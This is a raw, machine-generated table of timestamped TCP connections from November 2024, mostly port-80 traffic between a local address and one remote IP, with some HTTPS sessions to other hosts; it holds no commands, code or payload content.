Nov 13, 2024 20:39:49.980837107 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.981018066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981029987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981041908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981077909 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.981113911 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.981123924 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981137991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981182098 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.981297016 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981327057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981338978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981381893 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.981415033 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.981420040 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981508017 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981559038 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.981571913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981584072 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981595993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.981621981 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.981621981 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.981656075 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.058048010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.058068037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.058077097 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.058135033 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.058135033 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.058197021 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.058208942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.058219910 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.058231115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.058243990 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.058252096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.058264017 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.058264971 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.058286905 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.058305025 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.059159994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.059338093 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.059393883 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.096892118 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097038984 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097074986 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097084999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097096920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097115993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097131014 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097152948 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097152948 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097153902 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097153902 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097208977 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097213030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097225904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097235918 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097269058 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097301960 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097542048 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097589016 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097688913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097698927 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097707033 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097722054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097738981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097738028 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097749949 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097789049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097789049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097790003 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097836018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097846031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097856998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097882986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097887993 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097887993 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097894907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097906113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.097919941 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097946882 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.097946882 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098047018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098057985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098067999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098098040 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098100901 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098135948 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098140955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098154068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098157883 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098179102 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098181009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098192930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098215103 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098221064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098221064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098221064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098258018 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098588943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098633051 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098710060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098718882 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098758936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098797083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098808050 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098819017 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098829031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098839998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.098859072 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098859072 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.098893881 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.175641060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.175658941 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.175672054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.175764084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.175775051 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.175786018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.175812960 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.175823927 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.175822973 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.175822973 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.175822973 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.175822973 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.175925970 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.175925970 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.183710098 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.188297987 CET	49944	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.188328981 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.189016104 CET	49944	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.189023018 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.213804007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.213819027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.213828087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.213839054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.213848114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.213974953 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.213974953 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.214925051 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.214941978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.214951992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.214997053 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215018988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215022087 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215029955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215040922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215050936 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215074062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215110064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215229034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215245008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215254068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215265989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215271950 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215276957 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215289116 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215295076 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215300083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215320110 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215353012 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215353012 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215353966 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215353966 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215382099 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215450048 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215464115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215475082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215513945 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215545893 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215555906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215564966 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215601921 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215601921 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215605021 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215617895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215627909 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215640068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215641975 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215665102 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215665102 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215692043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.215693951 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.215761900 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.216226101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216236115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216249943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216259003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216269016 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216284990 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216288090 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.216295958 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216305971 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216310024 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.216317892 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216327906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.216330051 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.216352940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.216384888 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.245028973 CET	443	49945	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.246906996 CET	49945	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.246938944 CET	443	49945	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.247540951 CET	49945	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.247549057 CET	443	49945	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.253349066 CET	443	49943	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.253940105 CET	49943	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.254029989 CET	443	49943	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.254328966 CET	49943	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.254344940 CET	443	49943	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.292517900 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.292537928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.292550087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.292737007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.292741060 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.292748928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.292742014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.292762995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.292774916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.292849064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.292849064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.292850018 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.292869091 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.292924881 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.307274103 CET	49948	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:50.307306051 CET	443	49948	52.178.17.2	192.168.2.5
Nov 13, 2024 20:39:50.307405949 CET	49948	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:50.307730913 CET	49948	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:50.307740927 CET	443	49948	52.178.17.2	192.168.2.5
Nov 13, 2024 20:39:50.310630083 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:50.310723066 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:50.310795069 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:50.311048031 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:50.311084032 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:50.324426889 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.324460983 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.324515104 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.324568987 CET	49944	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.331180096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.331193924 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.331204891 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.331283092 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.331280947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.331280947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.331294060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.331305027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.331464052 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.331464052 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.332556009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332571030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332582951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332626104 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.332655907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.332679987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332690954 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332707882 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332717896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332729101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332741022 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332741022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.332741022 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.332752943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332766056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332768917 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.332777977 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332791090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332797050 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.332803011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332815886 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.332819939 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.332840919 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.332859039 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333023071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333039045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333055973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333065987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333076954 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333084106 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333089113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333101034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333111048 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333122969 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333125114 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333146095 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333170891 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333539009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333551884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333563089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333585024 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333611965 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333718061 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333729982 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333761930 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333787918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333830118 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333848953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333882093 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333909988 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.333937883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333950043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333960056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333971024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333981991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333992004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.333992004 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.334005117 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.334012985 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.334017992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.334031105 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.334053993 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.334100008 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.337343931 CET	49944	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.337376118 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.337393045 CET	49944	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.337402105 CET	443	49944	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.342303038 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.356972933 CET	443	49947	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.375406027 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:50.375499964 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:50.375751019 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:50.376084089 CET	49951	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:50.376177073 CET	443	49951	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:50.376346111 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:50.376369953 CET	49951	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:50.376384974 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:50.376607895 CET	49951	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:50.376637936 CET	443	49951	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:50.382752895 CET	443	49943	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.382822990 CET	443	49943	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.382894039 CET	443	49945	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.382951975 CET	443	49945	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.382994890 CET	49945	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.383025885 CET	49943	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.394155025 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.409913063 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.409930944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.409943104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.410109043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.410118103 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.410120964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.410128117 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.410121918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.410137892 CET	80	49873	185.215.113.206	192.168.2.5
